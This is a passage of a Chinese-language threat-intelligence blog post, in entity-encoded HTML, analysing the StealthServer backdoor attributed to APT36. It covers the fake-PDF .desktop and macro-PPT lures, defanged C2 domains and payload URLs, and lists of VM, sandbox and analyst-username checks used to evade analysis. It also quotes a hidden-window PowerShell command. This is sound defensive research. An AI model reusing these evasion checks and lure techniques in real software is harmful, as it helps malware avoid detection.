&#x7EC4;&#x7EC7;&#x5728;&#x6B64;&#x6301;&#x7EED;&#x6D3B;&#x8DC3;&#x4E14;&#x653B;&#x51FB;&#x9891;&#x7387;&#x548C;&#x6280;&#x672F;&#x6C34;&#x5E73;&#x4E0D;&#x65AD;&#x63D0;&#x5347;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x5728;&#x5173;&#x6CE8;&#x548C;&#x6536;&#x96C6;&#x76F8;&#x5173;&#x7EBF;&#x7D22;&#x3002;&#x4ECE;&#x4E03;&#x6708;&#x521D;&#x4EE5;&#x6765;&#x9646;&#x7EED;&#x6355;&#x83B7;&#x5230;&#x4E00;&#x6279;&#x65B0;&#x7684;&#x6837;&#x672C;&#xFF0C;&#x5305;&#x62EC; Windows &#x548C; Linux &#x5E73;&#x53F0;&#xFF0C;&#x8FD9;&#x4E9B;&#x6587;&#x4EF6;&#x7684;&#x540D;&#x5B57;&#x591A;&#x4E0E;&#x4F1A;&#x8BAE;&#x3001;&#x91C7;&#x8D2D;&#x7B49;&#x8BDD;&#x9898;&#x76F8;&#x5173;&#xFF0C;&#x6BD4;&#x5982; <strong>&#x201C;Meeting_Ltr_ID1543ops.pdf.desktop&#x201D;</strong>&#x3001;<strong>&#x201C;PROCUREMENT_OF_MANPORTABLE_&amp;_COMPAC.pdf.desktop&#x201D;</strong>&#xFF0C;&#x5728;&#x6267;&#x884C;&#x65F6;&#x8868;&#x9762;&#x4E0A;&#x4F1A;&#x6253;&#x5F00;&#x4E00;&#x4EFD; PDF &#x6587;&#x6863;&#x4EE5;&#x8BEF;&#x5BFC;&#x7528;&#x6237;&#xFF0C;&#x800C;&#x771F;&#x6B63;&#x7684;&#x6076;&#x610F;&#x8D1F;&#x8F7D;&#x5728;&#x540E;&#x53F0;&#x9759;&#x9ED8;&#x8FD0;&#x884C;&#xFF0C;&#x6253;&#x5F00;&#x7684;&#x6587;&#x6863;&#x5185;&#x5BB9;&#x4E5F;&#x591A;&#x4E0E;&#x653F;&#x6CBB;&#x3001;&#x519B;&#x961F;&#x3001;&#x4F1A;&#x8BAE;&#x7B49;&#x8BDD;&#x9898;&#x76F8;&#x5173;&#xFF0C;&#x4E14;&#x57FA;&#x672C;&#x4E0E;&#x5357;&#x4E9A;&#x67D0;&#x56FD;&#x76F8;&#x5173;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/fakepdf.jpeg" alt="fakepdf.jpeg" loading="lazy"></p>
<p>&#x7ECF;&#x8FC7;&#x5206;&#x6790;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x6B3E;&#x540D;&#x4E3A; <strong>&#x201C;StealthServer&#x201D;</strong> &#x7684;&#x540E;&#x95E8;&#xFF0C;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x4F7F;&#x7528; Golang &#x7F16;&#x5199;&#xFF0C;&#x652F;&#x6301; Windows &#x548C; Linux &#x53CC;&#x5E73;&#x53F0;&#xFF0C;&#x5305;&#x62EC;&#x591A;&#x4E2A;&#x8FED;&#x4EE3;&#x7248;&#x672C;&#x3002;&#x201C;StealthServer&#x201D;&#x8FD9;&#x4E2A;&#x540D;&#x5B57;&#x6765;&#x6E90;&#x4E8E;&#x6700;&#x521D;&#x53D1;&#x73B0;&#x7684; Linux &#x6837;&#x672C;&#xFF0C;&#x5176;&#x901A;&#x4FE1;&#x670D;&#x52A1;&#x5668;&#x5728;&#x6536;&#x5230;&#x5BA2;&#x6237;&#x7AEF;&#x4E0A;&#x7EBF;&#x4E4B;&#x540E;&#x4F1A;&#x54CD;&#x5E94;&#x4E00;&#x6761;&#x786E;&#x8BA4;&#x4FE1;&#x606F;<code>{&quot;service&quot;:&quot;stealth-server&quot;,&quot;status&quot;:&quot;ok&quot;}</code>&#x3002;&#x5728;&#x4E4B;&#x540E;&#x53D1;&#x73B0;&#x7684;&#x4E00;&#x4E2A; Windows &#x53D8;&#x79CD;&#x4E2D;&#x8FD8;&#x53D1;&#x73B0;&#x4E86;&#x5927;&#x91CF;&#x7C7B;&#x4F3C; <strong>&#x201C;ULTRA-&#x201D;</strong> &#x7684;&#x5B57;&#x6837;&#xFF0C;&#x8868;&#x660E;&#x5F00;&#x53D1;&#x8005;&#x66FE;&#x60F3;&#x5C06; Windows &#x7248;&#x672C;&#x547D;&#x540D;&#x4E3A; <strong>&#x201C;ULTRA-CLIENT&#x201D;</strong>&#xFF0C;&#x4F46;&#x5728;&#x540E;&#x7EED;&#x7684; Windows &#x53D8;&#x79CD;&#x91CC;&#x53BB;&#x6389;&#x4E86;&#x8FD9;&#x4E00;&#x7279;&#x5F81;&#xFF0C;&#x56E0;&#x6B64;&#x8FD9;&#x91CC;&#x5C06;&#x4E24;&#x4E2A;&#x5E73;&#x53F0;&#x7684;&#x6837;&#x672C;&#x7EDF;&#x4E00;&#x79F0;&#x4E3A; <strong>&#x201C;StealthServer&#x201D;</strong>&#x3002;</p>
<p>&#x529F;&#x80FD;&#x65B9;&#x9762;&#xFF0C;StealthServer &#x5B9E;&#x73B0;&#x4E86;&#x4E24;&#x4E2A;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#xFF1A;&#x4E00;&#x662F;&#x7A83;&#x53D6;&#x53D7;&#x5BB3;&#x8005;&#x4E3B;&#x673A;&#x4E0A;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x4E8C;&#x662F;&#x6267;&#x884C; C2 &#x4E0B;&#x53D1;&#x7684;&#x4EFB;&#x610F;&#x547D;&#x4EE4;&#x3002;&#x534F;&#x8BAE;&#x65B9;&#x9762;&#xFF0C;StealthServer &#x79EF;&#x6781;&#x5C1D;&#x8BD5;&#x5207;&#x6362;&#x4E0D;&#x540C;&#x7684;&#x534F;&#x8BAE;&#x8FDB;&#x884C;&#x901A;&#x4FE1;&#xFF1A;&#x76EE;&#x524D;&#x8BC6;&#x522B;&#x4E86;&#x4E09;&#x4E2A; Windows &#x53D8;&#x79CD;&#xFF0C;&#x524D;&#x4E24;&#x4E2A;&#x53D8;&#x79CD;&#x901A;&#x8FC7; TCP Socket &#x901A;&#x4FE1;&#xFF0C;&#x7B2C;&#x4E09;&#x4E2A;&#x53D8;&#x79CD;&#x5207;&#x6362;&#x4E3A; WebSocket &#x534F;&#x8BAE;&#xFF1B;Linux &#x6837;&#x672C;&#x4E2D;&#x5219;&#x53D1;&#x73B0;&#x4E86;&#x4E24;&#x4E2A;&#x53D8;&#x79CD;&#xFF0C;&#x5206;&#x522B;&#x4F7F;&#x7528; HTTP &#x548C; WebSocket &#x534F;&#x8BAE;&#x3002;</p>
<p>&#x9664;&#x6B64;&#x4E4B;&#x5916;&#xFF0C;StealthServer &#x6700;&#x663E;&#x8457;&#x7684;&#x7279;&#x70B9;&#x662F;&#x901A;&#x8FC7;&#x63D2;&#x5165;&#x5927;&#x91CF;&#x5783;&#x573E;&#x4EE3;&#x7801;&#x548C;&#x5783;&#x573E;&#x51FD;&#x6570;&#x6765;&#x5E72;&#x6270;&#x5206;&#x6790;&#x4EBA;&#x5458;&#xFF0C;&#x663E;&#x8457;&#x62D6;&#x6162;&#x9006;&#x5411;&#x5DE5;&#x7A0B;&#x7684;&#x8FDB;&#x5EA6;&#xFF0C;&#x67D0;&#x4E9B;&#x53D8;&#x79CD;&#x8FD8;&#x8BD5;&#x56FE;&#x901A;&#x8FC7;&#x5FAA;&#x73AF;&#x8BBF;&#x95EE;&#x201C;google.com&#x201D;&#x3001;&#x201C;microsoft.com&#x201D;&#x7B49;&#x7C7B;&#x4F3C;&#x7684;&#x767D;&#x540D;&#x5355;&#x57DF;&#x540D;&#x6765;&#x5E72;&#x6270;&#x6D41;&#x91CF;&#x5206;&#x6790;&#x3002;</p>
<p>&#x901A;&#x8FC7;&#x6211;&#x4EEC;&#x7684;&#x6D4B;&#x7ED8;&#x7CFB;&#x7EDF;&#x641C;&#x7D22;&#x4ECA;&#x5E74;&#x516D;&#x6708;&#x521D;&#x4EE5;&#x6765; <strong>Web.Title=&quot;*Stealth Server*&quot;</strong> &#x7684;&#x8D44;&#x4EA7;&#xFF0C;&#x80FD;&#x53D1;&#x73B0;&#x4E00;&#x4E9B;&#x5B58;&#x6D3B;&#x7684;&#x540E;&#x53F0;&#x767B;&#x5F55;&#x5730;&#x5740;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x4E2D;&#x7AD9;&#x70B9;&#x6807;&#x9898;&#x4E3A; <strong>&#x201C;Stealth Server - Login&#x201D;</strong> &#x7684;&#x6761;&#x76EE;&#x6240;&#x793A;&#x3002;&#x7531;&#x4E8E; StealthServer &#x7684; C2 &#x5B58;&#x6D3B;&#x65F6;&#x95F4;&#x4E00;&#x822C;&#x8F83;&#x77ED;&#xFF0C;&#x5E76;&#x65E0;&#x592A;&#x591A;&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x6216;&#x611F;&#x67D3;&#x65B9;&#x9762;&#x7684;&#x89C6;&#x91CE;&#xFF0C;&#x56E0;&#x6B64;&#x672C;&#x6587;&#x91CD;&#x70B9;&#x653E;&#x5728;&#x6837;&#x672C;&#x5206;&#x6790;&#x90E8;&#x5206;&#xFF0C;&#x4E00;&#x4E9B;&#x65E9;&#x671F;&#x9488;&#x5BF9;&#x90E8;&#x5206;&#x53D8;&#x79CD;&#x7684;<a href="https://www.linkedin.com/posts/pushprajthakre_apt36-cyberespionage-transparenttribe-activity-7364565847383695362-OSk3?ref=blog.xlab.qianxin.com">&#x5206;&#x6790;&#x7EBF;&#x7D22;</a>&#x4E5F;&#x53EF;&#x4EE5;&#x4F5C;&#x4E3A;&#x53C2;&#x8003;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/hunter-1.png" alt="hunter-1.png" loading="lazy"></p>
<p>&#x540E;&#x53F0;&#x767B;&#x5F55;&#x754C;&#x9762;&#x5982;&#x4E0B;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/StealthServer_BackEnd_Login-1.png" alt="StealthServer_BackEnd_Login.png" loading="lazy"></p>
<h1 id="%E5%85%B3%E8%81%94%E5%88%86%E6%9E%90">&#x5173;&#x8054;&#x5206;&#x6790;</h1>
<p>&#x57FA;&#x4E8E;&#x4EE5;&#x4E0B;&#x51E0;&#x70B9;&#x7EBF;&#x7D22;&#xFF0C;&#x63A8;&#x6D4B;&#x8BE5;&#x540E;&#x95E8;&#x53EF;&#x80FD;&#x4E0E; APT36 &#x5B58;&#x5728;&#x4E00;&#x4E9B;&#x5173;&#x8054;&#x3002;</p>
<p>1&#xFF09;&#x6837;&#x672C;&#x884C;&#x4E3A;&#x7279;&#x5F81;&#x7B26;&#x5408;&#x8BE5;&#x7EC4;&#x7EC7;&#x7684;<a href="https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/?ref=blog.xlab.qianxin.com">&#x5386;&#x53F2;&#x6837;&#x672C;&#x7279;&#x5F81;</a>&#xFF1A;&#x6BD4;&#x5982;&#x4F7F;&#x7528; .desktop &#x5206;&#x53D1;&#x4E8C;&#x8FDB;&#x5236; ELF &#x6587;&#x4EF6;&#xFF0C;&#x8FD9;&#x4E9B; .desktop &#x6587;&#x4EF6;&#x901A;&#x5E38;&#x4F2A;&#x88C5;&#x4E3A; PDF &#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#xFF0C;&#x6587;&#x4EF6;&#x540D;&#x4EE5;&#x53CA;&#x6253;&#x5F00;&#x7684; PDF &#x6587;&#x4EF6;&#x5185;&#x5BB9;&#x591A;&#x4E0E;&#x653F;&#x6CBB;&#x3001;&#x91C7;&#x8D2D;&#x3001;&#x4F1A;&#x8BAE;&#x7B49;&#x8BDD;&#x9898;&#x6709;&#x5173;&#x4E14;&#x591A;&#x4E0E;&#x5357;&#x4E9A;&#x67D0;&#x56FD;&#x76F8;&#x5173;&#xFF0C;PDF &#x6587;&#x4EF6;&#x7684; URL &#x4E00;&#x822C;&#x4EE5; Google Drive &#x94FE;&#x63A5;&#x7684;&#x5F62;&#x5F0F;&#x5B58;&#x5728;&#x3002;</p>
<p>2&#xFF09;C2 &#x4E0E;&#x8BE5;&#x7EC4;&#x7EC7;&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x5B58;&#x5728;&#x5173;&#x8054;&#xFF0C;&#x8FD9;&#x70B9;&#x4E3B;&#x8981;&#x57FA;&#x4E8E;&#x57DF;&#x540D;&#x7ED3;&#x6784;&#x7684;&#x76F8;&#x4F3C;&#x6027;&#x8FDB;&#x884C;&#x63A8;&#x6D4B;&#xFF1A;StealthServer &#x4F7F;&#x7528;&#x7684;&#x57DF;&#x540D;&#x591A;&#x6A21;&#x4EFF;&#x67D0;&#x56FD;&#x653F;&#x5E9C;&#x90E8;&#x95E8;&#x7684;&#x7AD9;&#x70B9;&#x6216;&#x5DE5;&#x5177;&#x6BD4;&#x5982;<code>&#x201C;modindia[.]serveminecraft.net&#x201D;&#x3001;&#x201C;modgovindia[.]space&#x201D;&#x3001;&#x201C;kavach[.]space&#x201D;</code>&#xFF0C;&#x8FD9;&#x4E9B; C2 &#x4E0E;&#x8FD1;&#x671F;&#x4E00;&#x4E9B;&#x9488;&#x5BF9;&#x8BE5;&#x7EC4;&#x7EC7;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x76F8;&#x5173;&#x7684;<a href="https://hunt.io/blog/apt36-india-infrastructure-attacks?ref=blog.xlab.qianxin.com">&#x5206;&#x6790;&#x62A5;&#x544A;</a>&#x4E2D;&#x63D0;&#x5230;&#x7684; IoC &#x5B58;&#x5728;&#x547D;&#x540D;&#x7ED3;&#x6784;&#x4E0A;&#x7684;&#x76F8;&#x4F3C;&#x6027;&#x4EE5;&#x53CA;&#x89E3;&#x6790;&#x65B9;&#x9762;&#x7684;&#x5173;&#x8054;&#x6027;&#xFF0C;&#x6BD4;&#x5982;<code>&#x201C;modindia[.]serveminecraft.net&#x201D;</code>&#x548C;<code>&#x201C;modgovindia[.]space&#x201D;</code>&#x5728;&#x4E03;&#x6708;&#x521D;&#x89E3;&#x6790;&#x5230;<code>&#x201C;101.99.94[.]109&#x201C;</code>&#xFF0C;&#x6B64;&#x5916;&#x4ECA;&#x5E74;&#x516D;&#x6708;&#x4E2D;&#x65EC;&#x8FD8;&#x6709;&#x53E6;&#x4E00;&#x4E2A;&#x57DF;&#x540D;<code>&#x201C;zahcomputers.pk[.]modpersonnel.support&#x201D;</code>&#x4E14;&#x53EA;&#x6709;&#x8BE5;&#x57DF;&#x540D;&#x89E3;&#x6790;&#x5230;&#x8FD9;&#x4E2A; IP&#xFF0C;&#x8FD9;&#x4E9B;&#x57DF;&#x540D;&#x4E0E;&#x4E0A;&#x8FF0;&#x5206;&#x6790;&#x6587;&#x7AE0;&#x91CC;&#x63D0;&#x5230;&#x7684;&#x540C;&#x671F;&#x51FA;&#x73B0;&#x7684;&#x7591;&#x4F3C;&#x8BE5;&#x7EC4;&#x7EC7;&#x4F7F;&#x7528;&#x7684;&#x9493;&#x9C7C;&#x57DF;&#x540D;&#x6BD4;&#x5982;<code>&#x201C;mod.gov.in[.]defencepersonnel.support&#x201D;&#x3001;&#x201C;email.gov.in[.]modindia.link&#x201D;</code>&#x7B49;&#x5B58;&#x5728;&#x9AD8;&#x5EA6;&#x76F8;&#x4F3C;&#x7684;&#x7ED3;&#x6784;&#xFF0C;&#x4ECA;&#x5E74;&#x56DB;&#x6708;&#x4EFD; SEQRITE &#x53D1;&#x5E03;&#x7684;&#x4E00;&#x4EFD;<a href="https://www.seqrite.com/blog/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government/?ref=blog.xlab.qianxin.com">&#x5206;&#x6790;&#x62A5;&#x544A;</a>&#x4E2D;&#x63D0;&#x5230;&#x8BE5;&#x7EC4;&#x7EC7;&#x4F7F;&#x7528;&#x4E86;&#x5927;&#x91CF;&#x7C7B;&#x4F3C;&#x4E0A;&#x8FF0;&#x201C;.support&#x201D;&#x3001;&#x201C;.link&#x201D;&#x7B49;&#x7ED3;&#x6784;&#x7684;&#x57DF;&#x540D;&#x7528;&#x4E8E;&#x9493;&#x9C7C;&#x3002;</p>
<p>3&#xFF09;&#x90E8;&#x5206;<a href="https://www.cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery?ref=blog.xlab.qianxin.com">&#x5206;&#x6790;&#x62A5;&#x544A;</a>&#x548C;&#x5B89;&#x5168;&#x7814;&#x7A76;&#x4EBA;&#x5458;&#x7684;<a href="https://x.com/Cyberteam008/status/1966104752779047237?ref=blog.xlab.qianxin.com">&#x516C;&#x5F00;&#x6570;&#x636E;</a>&#x5C06;&#x67D0;&#x4E9B; C2 &#x6807;&#x8BB0;&#x4E3A;&#x8BE5;&#x7EC4;&#x7EC7;&#x6240;&#x5C5E;&#x3002;</p>
<h1 id="stealthserver-%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90">StealthServer &#x6837;&#x672C;&#x5206;&#x6790;</h1>
<p>Windows &#x548C; Linux &#x5E73;&#x53F0;&#x7684;&#x6837;&#x672C;&#x90FD;&#x4F7F;&#x7528; Golang &#x5F00;&#x53D1;&#xFF0C;&#x4E14;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x51E0;&#x4E4E;&#x4E00;&#x81F4;&#xFF0C;&#x57FA;&#x672C;&#x7B26;&#x5408;<code>*/bossmaya/*/obfuscated*.go</code>&#x8FD9;&#x4E00;&#x7ED3;&#x6784;&#xFF0C;&#x6211;&#x4EEC;&#x6536;&#x96C6;&#x4E86;&#x4E24;&#x79CD;&#x5E73;&#x53F0;&#x7684;&#x4E00;&#x4E9B;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x5982;&#x4E0B;&#x6240;&#x793A;&#x3002;</p>
<pre><code>EXE:
D:/bossmaya/linuxnewdownloader/windows-client/obfuscated_main.go
D:/bossmaya/newblkul/client/client_obfuscated.go
D:/bossmaya/newblkul/client/client.go

ELF:
D:/bossmaya/client/obfuscated_client.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go
/home/boss/Desktop/tgtfile/main_obfuscated_enhanced.go
</code></pre>
<p>&#x6837;&#x672C;&#x52A0;&#x8F7D;&#x65B9;&#x9762;&#xFF0C;Windows &#x7684;&#x6837;&#x672C;&#x4F7F;&#x7528;&#x5305;&#x542B;&#x6076;&#x610F;&#x5B8F;&#x4EE3;&#x7801;&#x7684; PPT &#x6587;&#x6863;&#x4F5C;&#x4E3A;&#x52A0;&#x8F7D;&#x6587;&#x4EF6;&#xFF0C;Linux &#x7684;&#x6837;&#x672C;&#x5219;&#x4F7F;&#x7528;&#x8BE5;&#x7EC4;&#x7EC7;&#x60EF;&#x7528;&#x7684; .desktop &#x6587;&#x4EF6;&#x3002;&#x5C3D;&#x7BA1;&#x4E24;&#x79CD;&#x5E73;&#x53F0;&#x7684;&#x6837;&#x672C;&#x5728;&#x5177;&#x4F53;&#x529F;&#x80FD;&#x4E0A;&#x7565;&#x6709;&#x5DEE;&#x5F02;&#xFF0C;&#x4F46;&#x4ECD;&#x8868;&#x73B0;&#x51FA;&#x8F83;&#x591A;&#x5171;&#x6027;&#xFF0C;&#x9664;&#x4E86;&#x9AD8;&#x5EA6;&#x76F8;&#x4F3C;&#x7684;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x4EE5;&#x5916;&#xFF0C;&#x8FD8;&#x6709;&#x7C7B;&#x4F3C;&#x7684;&#x865A;&#x62DF;&#x73AF;&#x5883;&#x68C0;&#x6D4B;&#x3001;&#x6301;&#x4E45;&#x5316;&#x7B49;&#x65B9;&#x6CD5;&#x3002;&#x4F46;&#x7EFC;&#x5408;&#x6765;&#x770B;&#xFF0C;&#x4EE5;&#x4E0B;&#x4E24;&#x70B9;&#x662F;&#x4E24;&#x4E2A;&#x5E73;&#x53F0;&#x7684;&#x6837;&#x672C;&#x6700;&#x7A81;&#x51FA;&#x7684;&#x5171;&#x540C;&#x7279;&#x5F81;&#x3002;</p>
<p>&#xFF08;1&#xFF09;&#x76F8;&#x4F3C;&#x7684;&#x4EE3;&#x7801;&#x7ED3;&#x6784;&#xFF0C;&#x524D;&#x9762;&#x5927;&#x7247;&#x7684;&#x4EE3;&#x7801;&#x90FD;&#x662F;&#x5783;&#x573E;&#x4EE3;&#x7801;&#x548C;&#x5783;&#x573E;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF0C;&#x6838;&#x5FC3;&#x4EE3;&#x7801;&#x653E;&#x5728;&#x5C3E;&#x90E8;&#xFF0C;&#x8FD9;&#x53EF;&#x4EE5;&#x6709;&#x6548;&#x62D6;&#x6162;&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/ProcessGraph.jpg" alt="ProcessGraph.jpg" loading="lazy"></p>
<p>&#xFF08;2&#xFF09;&#x76F8;&#x4F3C;&#x7684;&#x5783;&#x573E;&#x4EE3;&#x7801;&#x673A;&#x5236;&#xFF0C;&#x9664;&#x4E86;&#x5728;&#x6837;&#x672C;&#x5F00;&#x5934;&#x653E;&#x7F6E;&#x5927;&#x91CF;&#x5783;&#x573E;&#x4EE3;&#x7801;&#x4EE5;&#x5916;&#xFF0C;&#x8FD8;&#x4F1A;&#x5728;&#x5173;&#x952E;&#x4EE3;&#x7801;&#x7684;&#x4E0A;&#x4E0B;&#x6587;&#x63D2;&#x5165;&#x5783;&#x573E;&#x4EE3;&#x7801;&#xFF0C;&#x4E14;&#x67D0;&#x4E9B;&#x5783;&#x573E;&#x51FD;&#x6570;&#x4F7F;&#x7528;&#x4E86;&#x76F8;&#x540C;&#x7684;&#x4EE3;&#x7801;&#x5B9E;&#x73B0;&#xFF0C;&#x6BD4;&#x5982;&#x65E0;&#x610F;&#x4E49;&#x7684;&#x5FAA;&#x73AF;&#x8BA1;&#x7B97;&#x3001;&#x65E0;&#x610F;&#x4E49;&#x7684;&#x52A0;&#x5BC6;&#x89E3;&#x5BC6;&#x7B97;&#x6CD5;&#x7B49;&#xFF0C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#x662F;&#x4E00;&#x4E2A;&#x65E0;&#x610F;&#x4E49;&#x7684;&#x6590;&#x6CE2;&#x90A3;&#x5951;&#x5E8F;&#x5217;&#x5B9E;&#x73B0;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/junk_code.jpg" alt="junk_code.jpg" loading="lazy"></p>
<h2 id="windows-v1-tcp"><strong>Windows-V1: TCP</strong></h2>
<h3 id="loader">#Loader</h3>
<p>Windows &#x53D8;&#x79CD;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x7248;&#x672C;&#x51FA;&#x73B0;&#x5728;&#x4E03;&#x6708;&#x4EFD;&#xFF0C;&#x5165;&#x53E3;&#x6587;&#x4EF6;&#x662F;&#x4E00;&#x4E2A;&#x540D;&#x4E3A; <strong>&#x201C;PM &amp; Est Sanction Final 2025.ppam&#x201D;</strong> &#x7684; PPT &#x6587;&#x6863;&#xFF0C;&#x8FD9;&#x4E2A;&#x6587;&#x6863;&#x5185;&#x542B;&#x4E00;&#x6BB5;&#x6076;&#x610F;&#x5B8F;&#x811A;&#x672C;&#xFF0C;&#x53EF;&#x4EE5;&#x7528; oledump &#x5DE5;&#x5177;&#x63D0;&#x53D6;&#x51FA;&#x6765;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;&#x5F53;&#x7528;&#x6237;&#x8BBE;&#x7F6E;&#x5141;&#x8BB8; Office &#x6587;&#x6863;&#x7684;&#x5B8F;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x65F6;&#xFF0C;&#x4F1A;&#x81EA;&#x52A8;&#x6267;&#x884C;&#x4E0B;&#x8FF0;&#x5B8F;&#x4EE3;&#x7801;&#xFF0C;&#x6574;&#x4E2A;&#x8FD0;&#x884C;&#x8FC7;&#x7A0B;&#x6D89;&#x53CA;&#x4E24;&#x4E2A; URL&#xFF0C;&#x5176;&#x4E2D;&#x7B2C;&#x4E00;&#x4E2A;<code>https://filestore[.]space/SoftsCompany/d/11/MES-Presentation</code>&#x662F;&#x7528;&#x4E8E;&#x8BEF;&#x5BFC;&#x7528;&#x6237;&#x7684; ppt&#xFF0C;&#x7B2C;&#x4E8C;&#x4E2A;<code>https://filestore[.]space/SoftsCompany/d/14/nodejs</code>&#x662F;&#x6076;&#x610F;&#x8F7D;&#x8377; StealthServer&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Macro.jpg" alt="Macro.jpg" loading="lazy"></p>
<h3 id="stealthserver">#StealthServer</h3>
<h4 id="1-%E5%88%86%E6%9E%90%E5%AF%B9%E6%8A%97">1. &#x5206;&#x6790;&#x5BF9;&#x6297;</h4>
<p>&#x9664;&#x4E86;&#x4F7F;&#x7528;&#x5927;&#x91CF;&#x5783;&#x573E;&#x4EE3;&#x7801;&#x4E4B;&#x5916;&#xFF0C;StealthServer &#x8FD8;&#x4F7F;&#x7528;&#x4E86;&#x8F83;&#x591A;&#x624B;&#x6BB5;&#x6765;&#x5BF9;&#x6297;&#x5206;&#x6790;&#xFF0C;&#x4EE5;&#x53CA;&#x8BBE;&#x7F6E;&#x6301;&#x4E45;&#x5316;&#x9A7B;&#x7559;&#x3002;</p>
<h5 id="%EF%BC%881%EF%BC%89%E5%8F%8D%E8%B0%83%E8%AF%95%E3%80%81%E5%8F%8D%E6%B2%99%E7%AE%B1">&#xFF08;1&#xFF09;&#x53CD;&#x8C03;&#x8BD5;&#x3001;&#x53CD;&#x6C99;&#x7BB1;</h5>
<p>&#x2460; &#x6267;&#x884C;&#x547D;&#x4EE4;<code>tasklist /fi &quot;imagename eq %s*&quot; | find /i &quot;%s&quot;</code>&#x68C0;&#x6D4B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x4E0B;&#x8FF0;&#x6C99;&#x7BB1;&#x548C;&#x865A;&#x62DF;&#x673A;&#x76F8;&#x5173;&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x8FDB;&#x7A0B;&#x3002;</p>
<pre><code>VMware
VirtualBox
VBOX
QEMU
Xen
Hyper-V
Parallels
KVM
Virtual
VM
vbox
vmware
</code></pre>
<p>&#x2461; &#x8C03;&#x7528; IsDebuggerPresent() &#x51FD;&#x6570;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5904;&#x4E8E;&#x8C03;&#x8BD5;&#x72B6;&#x6001;&#x3002;<br>
&#x2462; &#x83B7;&#x53D6; PEBDebugFlag &#x6765;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5904;&#x4E8E;&#x8C03;&#x8BD5;&#x72B6;&#x6001;&#x3002;<br>
&#x2463; &#x5224;&#x65AD;&#x4E0B;&#x8FF0;&#x76EE;&#x5F55;&#x662F;&#x5426;&#x5B58;&#x5728;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x5219;&#x8BA4;&#x4E3A;&#x5904;&#x4E8E;&#x5206;&#x6790;&#x73AF;&#x5883;&#x3002;</p>
<pre><code>C:\\analysis
C:\\sandbox
C:\\malware
C:\\sample
C:\\virus
C:\\quarantine
</code></pre>
<p>&#x2464; &#x5224;&#x65AD;&#x5F53;&#x524D;&#x7528;&#x6237;&#x540D;&#x662F;&#x5426;&#x662F;&#x4E0B;&#x8FF0;&#x5217;&#x8868;&#x4E2D;&#x4E4B;&#x4E00;&#xFF0C;&#x5982;&#x679C;&#x7B26;&#x5408;&#x5219;&#x5219;&#x8BA4;&#x4E3A;&#x5904;&#x4E8E;&#x5206;&#x6790;&#x73AF;&#x5883;&#x3002;</p>
<pre><code>admin
administrator
sandbox
malware
virus
user
test
analyst
john
jane
</code></pre>
<h5 id="%EF%BC%882%EF%BC%89%E5%B9%B2%E6%89%B0%E6%B5%81%E9%87%8F">&#xFF08;2&#xFF09;&#x5E72;&#x6270;&#x6D41;&#x91CF;</h5>
<p>&#x5FAA;&#x73AF;&#x8BF7;&#x6C42;&#x5982;&#x4E0B;&#x51E0;&#x4E2A;&#x7F51;&#x7AD9;&#xFF0C;&#x5E72;&#x6270;&#x6D41;&#x91CF;&#x5206;&#x6790;&#x3002;</p>
<pre><code>google.com
microsoft.com
cloudflare.com
amazon.com
facebook.com
httpbin.org
</code></pre>
<h5 id="%EF%BC%883%EF%BC%89%E9%9A%90%E8%97%8F%E7%BB%88%E7%AB%AF%E7%AA%97%E5%8F%A3">&#xFF08;3&#xFF09;&#x9690;&#x85CF;&#x7EC8;&#x7AEF;&#x7A97;&#x53E3;</h5>
<p>&#x8C03;&#x7528;&#x5982;&#x4E0B; powershell &#x6307;&#x4EE4;<code>cmd /C powershell -WindowStyle Hidden -Command exit</code>&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x9690;&#x85CF;&#x7684;&#x7EC8;&#x7AEF;&#x7A97;&#x53E3;&#x3002;</p>
<h5 id="%EF%BC%884%EF%BC%89%E4%BA%92%E6%96%A5%E4%BD%93%E6%A3%80%E6%B5%8B">&#xFF08;4&#xFF09;&#x4E92;&#x65A5;&#x4F53;&#x68C0;&#x6D4B;</h5>
